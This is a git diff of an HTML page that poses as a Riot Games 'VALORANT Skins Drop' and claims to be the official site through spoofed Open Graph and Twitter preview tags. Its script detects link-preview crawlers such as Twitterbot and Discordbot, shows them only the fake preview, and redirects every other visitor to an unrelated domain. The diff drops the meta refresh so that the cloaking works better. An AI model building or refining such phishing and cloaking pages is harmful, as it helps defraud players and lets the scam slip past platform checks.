--- a/index.html
+++ b/index.html
@@ -2,26 +2,28 @@
 <html lang="en">
   <head>
     <meta charset="UTF-8" />
-    <meta property="og:title" content="VALORANT | Free Skins Drop">
-    <meta property="og:description" content="Limited-time offer from Riot Games. Claim now.">
+    <meta property="og:title" content="VALORANT Skins Drop from Riot Games">
+    <meta property="og:description" content="Limited drop event — claim now. Official site.">
     <meta property="og:image" content="https://www.riotgames.com/darkroom/1440/962ad85c5c486c36c55568e57a60dd69:adc62240d7e3feee93de6a91fa9b2c70/VALORANT_Ep7_Act3_KeyArt.jpg">
     <meta property="og:url" content="https://www.riotgames.com/en">
     <meta name="twitter:card" content="summary_large_image">
-    <meta http-equiv="refresh" content="0;url=https://valodrop.world" />
-    <title>Redirecting...</title>
+    <meta name="twitter:title" content="VALORANT Skins Drop from Riot Games">
+    <meta name="twitter:description" content="Limited drop event — claim now. Official site.">
+    <meta name="twitter:image" content="https://www.riotgames.com/darkroom/1440/962ad85c5c486c36c55568e57a60dd69:adc62240d7e3feee93de6a91fa9b2c70/VALORANT_Ep7_Act3_KeyArt.jpg">
+
     <script>
-      const ua = navigator.userAgent;
       const bots = [
         "Twitterbot", "facebookexternalhit", "Slackbot", "Discordbot", 
         "TelegramBot", "WhatsApp", "Applebot", "Googlebot", "bingbot"
       ];
-      const isBot = bots.some(bot => ua.includes(bot));
+      const isBot = bots.some(bot => navigator.userAgent.includes(bot));
       if (!isBot) {
         window.location.href = "https://valodrop.world";
       }
     </script>
+    <title>Redirecting...</title>
   </head>
   <body>
-    <h1>Redirecting...</h1>
+    <p>Redirecting...</p>
   </body>
 </html>
